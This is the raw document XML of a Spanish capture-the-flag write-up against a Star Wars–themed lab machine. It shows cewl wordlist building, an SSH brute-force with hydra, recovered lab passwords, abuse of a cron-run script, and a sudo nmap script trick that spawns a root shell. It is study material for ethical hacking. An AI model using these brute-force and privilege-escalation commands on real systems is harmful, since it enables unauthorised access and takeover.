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Hacking </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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hjb064l5911d" w:id="1"/>
      <w:bookmarkEnd w:id="1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ético</w:t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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ncqwc238sads" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF StarWars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cqwc238sad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CTF StarWars</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _ncqwc238sads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mkarezk9heq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Reconocimiento</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _mkarezk9heqw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w9ryw4mllxtb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Explotación</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _w9ryw4mllxtb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2j0obbu6zo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Fuzzing</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _k2j0obbu6zot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nfvl60so695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han → babyYoda123</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _nfvl60so695x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s25x3w8mw82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Pista para usar cewl</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _s25x3w8mw82y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tb69os6ldfs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Darth secret</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _tb69os6ldfs6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83ly4cy3g83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Rutas</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _83ly4cy3g83u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s0ghl6r5sfe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Formulario de inicio</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _s0ghl6r5sfe2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doahiftivd3d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Credenciales</w:t>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _doahiftivd3d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Style w:val="Heading1"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mkarezk9heqw" w:id="3"/>
            <w:bookmarkEnd w:id="3"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconocimiento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416300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="29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1"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w9ryw4mllxtb" w:id="4"/>
            <w:bookmarkEnd w:id="4"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Explotación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6527800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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52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Source code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7772400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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777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492500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="19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aHR0cHM6Ly9zdHlsZXN1eHguZ2l0aHViLmlvL3N0ZWdhbm9ncmFwaHkvCg==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before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0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https://stylesuxx.github.io/steganography/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5010150"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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5010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Tenemos una contraseña sin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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k2j0obbu6zot" w:id="5"/>
            <w:bookmarkEnd w:id="5"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuzzing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</w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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327400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32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robots.txt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38625" cy="904875"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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904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http://10.0.2.237/r2d2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978400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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97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**cewl?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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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572000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="3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57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81475" cy="3248025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248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darth</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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vader</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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anakin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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skywalker</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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han</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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chewbacca</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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leia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Intrusión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Probamos una conexión ssh a la máquina con los usuarios y obtenermos credenciales válidas.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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nfvl60so695x" w:id="6"/>
            <w:bookmarkEnd w:id="6"/>
            <w:hyperlink w:anchor="_doahiftivd3d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han → babyYoda123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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nfvl60so695x" w:id="6"/>
            <w:bookmarkEnd w:id="6"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="5810250" cy="3429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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s25x3w8mw82y" w:id="7"/>
            <w:bookmarkEnd w:id="7"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pista para usar cewl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305300" cy="134302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1343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cewl -m 4 -w r2d2_dict http://10.0.2.237/r2d2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hydra -L users -P r2d2_dict 10.0.2.237 ssh -t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Lo dejamos en pausa. Tarda demasiado. Una vez sepamos  quien usará la cewl o reduzcamos las posibilidades volveremos.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Quedamos con tres usuarios, 2 posibles usuarios de la posible contraseña de cewl.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Skywalker y Darth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81000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="21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skywalker → tatooine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¿Debería haber algo aquí?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76725" cy="866775"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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866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Traigo los usuarios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47900" cy="742950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742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67225" cy="885825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885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/home/Darth/secrets/evil.py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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tb69os6ldfs6" w:id="8"/>
            <w:bookmarkEnd w:id="8"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Darth secret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72000" cy="1419225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419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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_83ly4cy3g83u" w:id="9"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rutas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81525" cy="180975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1809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Style w:val="Heading3"/>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s0ghl6r5sfe2" w:id="10"/>
            <w:bookmarkEnd w:id="10"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Formulario de inicio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127500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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12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Skywalker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note.txt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76750" cy="4953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2"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hueco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Volvemos al archivo </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">evil.py </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> y nos fijamos que se encuentra en el grupo </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">anakin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00550" cy="1009650"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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 ejecutarse cada minuto con el usuario Darth tenemos acceso a ejecución de comandos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29175" cy="1038225"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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038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749300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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092200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before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId3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https://gtfobins.github.io/gtfobins/nmap/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Modulo  para simular una shell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62425" cy="428625"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId3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https://gtfobins.github.io/gtfobins/nmap/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52800" cy="3409950"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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3409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Darth@starwars:~$ </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TF=$(mktemp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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TF=$(mktemp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
            <w:pPr>
              <w:widowControl w:val="0"/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Darth@starwars:~$ </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo 'os.execute("/bin/sh")' &gt; $TF</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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echo 'os.execute("/bin/sh")' &gt; $TF</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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Darth@starwars:~$ sudo nmap --script=$TF</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
            <w:pPr>
              <w:widowControl w:val="0"/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nmap --script=$TF</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066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Starting Nmap 7.70 ( https://nmap.org ) at 2024-01-31 16:53 EST</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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NSE: Warning: Loading '/tmp/tmp.iWKZ3Q3Ql2' -- the recommended file extension is '.nse'.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
            <w:pPr>
              <w:widowControl w:val="0"/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 whoami</w:t>
            </w:r>
          </w:p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root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43575" cy="4733925"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="27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473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MySecret.pdf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doahiftivd3d" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Credenciales</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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.5"/>
        <w:gridCol w:w="4687.5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4687.5"/>
            <w:gridCol w:w="468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babyYoda123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skywalker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tatooine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Darth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headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38" w:type="first"/>
      <w:footerReference r:id="rId39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" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line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3" name="image12.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line"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3"/>
    <w:bookmarkEnd w:id="13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2"/>
    <w:bookmarkEnd w:id="1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7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0.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/nmap/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/nmap/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stylesuxx.github.io/steganography/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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WorkSans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WorkSans-italic.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSans-bold.ttf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.ttf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/WorkSans-boldItalic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Economica-regular.ttf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-italic.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Economica-bold.ttf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans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